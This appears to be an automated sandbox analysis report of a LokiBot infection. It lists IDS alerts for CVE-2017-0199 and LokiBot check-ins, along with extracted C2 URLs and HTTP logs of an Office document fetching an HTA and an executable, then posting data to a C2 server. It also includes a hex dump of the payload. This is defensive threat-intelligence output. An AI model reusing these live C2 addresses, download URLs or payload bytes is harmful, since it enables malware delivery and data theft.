                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49234 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49215 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49259 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49260 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49220 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49221 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49260 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49221 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49184
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49241
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49215 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49275 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49259 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49260 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49226
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49238
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49234
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49232 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49197
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49204 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49260 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49220 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49260 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49275 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49275 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49215 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49221 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49239 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49232 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49275 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49239 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49275 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49221 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49239 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49204 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49204 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49202 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49220
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49202 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49204 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49252 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49215 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49215 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49221 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49259 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49202 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49204 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49232 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49252 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49259 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49259 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49239 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49202 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49221
                Source: Malware configuration extractorURLs: http://kbfvzoboss.bid/alien/fre.php
                Source: Malware configuration extractorURLs: http://alphastand.trade/alien/fre.php
                Source: Malware configuration extractorURLs: http://alphastand.win/alien/fre.php
                Source: Malware configuration extractorURLs: http://alphastand.top/alien/fre.php
                Source: Malware configuration extractorURLs: 94.156.177.41/maxzi/five/fre.php
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 8_2_035F0499 LoadLibraryW,URLDownloadToFileW,ShellExecuteW,ExitProcess,8_2_035F0499
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 20 Nov 2024 09:11:24 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12Last-Modified: Wed, 20 Nov 2024 01:27:09 GMTETag: "92a00-6274e0c657f44"Accept-Ranges: bytesContent-Length: 600576Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 ed 3a 3d 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 08 09 00 00 20 00 00 00 00 00 00 e6 26 09 00 00 20 00 00 00 40 09 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 80 09 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 94 26 09 00 4f 00 00 00 00 40 09 00 7c 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 09 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 ec 06 09 00 00 20 00 00 00 08 09 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 7c 1d 00 00 00 40 09 00 00 1e 00 00 00 0a 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 60 09 00 00 02 00 00 00 28 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 26 09 00 00 00 00 00 48 00 00 00 02 00 05 00 a8 36 00 00 0c 28 00 00 03 00 00 00 16 00 00 06 b4 5e 00 00 e0 c7 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c2 02 28 14 00 00 0a 02 03 7d 01 00 00 04 02 7b 01 00 00 04 72 01 00 00 70 20 d1 01 00 00 17 6f 35 00 00 06 02 7b 01 00 00 04 6f 37 00 00 06 26 2a 00 00 00 1b 30 03 00 1f 00 00 00 01 00 00 11 02 7b 01 00 00 04 03 04 6f 39 00 00 06 02 03 7d 02 00 00 04 17 0a de 05 26 16 0a de 00 06 2a 00 01 10 00 00 00 00 00 00 18 18 00 05 0a 00 00 02 1b 30 03 00 74 00 00 00 02 00 00 11 05 6f 15 00 00 0a 02 7b 01 00 00 04 02 7b 02 00 00 04 72 1f 00 00 70 28 16 00 00 0a 6f 3a 00 00 06 03 0a 16 0b 2b 25 06 07 9a 0c 02 7b 01 00 00 04 08 6f 17 00 00 0a 6f 3b 00 00 06 05 08 6f 18 00 00 0a de 03 26 de 00 07 17 58 0b 07 06 8e 69 32 d5 02 7b 01 00 00 04 04 6f 3c 00 00 06 17 0d de 10 26 02 7b 01 00 00 04 6f 3d 00 00 06 16 0d de 00 09 2a 01 1c 00 00 00 00 2b 00 1a 45 00 03 0a 00 00 02 00 00 06 00 5c 62 00 10 0a 00 00 02 32 02 7b 01 00 00 04 6f 41 00 00 06 2a 6e 02 28 19 00 00 0a 02 03 7d 03 00 00 04 02
                Source: Joe Sandbox ViewASN Name: ASN-QUADRANET-GLOBALUS ASN-QUADRANET-GLOBALUS
                Source: Joe Sandbox ViewASN Name: NET1-ASBG NET1-ASBG
                Source: Joe Sandbox ViewJA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
                Source: Joe Sandbox ViewJA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
                Source: Network trafficSuricata IDS: 2024449 - Severity 1 - ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl : 192.168.2.22:49169 -> 66.63.187.231:80
                Source: global trafficHTTP traffic detected: GET /Ib9yLe?&shoelace=strong&skyscraper=discreet&roll=thoughtful&mimosa=wacky&vulture HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: provit.ukConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xampp/wer/we/seemybestoptionforentiretimegivenmebackwith______suchagreatthignswithentiretimewithmegood______seethebestthignsalwaysgivnebestthigns.doc HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: 66.63.187.231Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xampp/wer/goodtoseeuthatgreatthingswithentirethingsgreatfor.hta HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 66.63.187.231Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /33/caspol.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 66.63.187.231Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 176Connection: close
                Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 176Connection: close
                Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
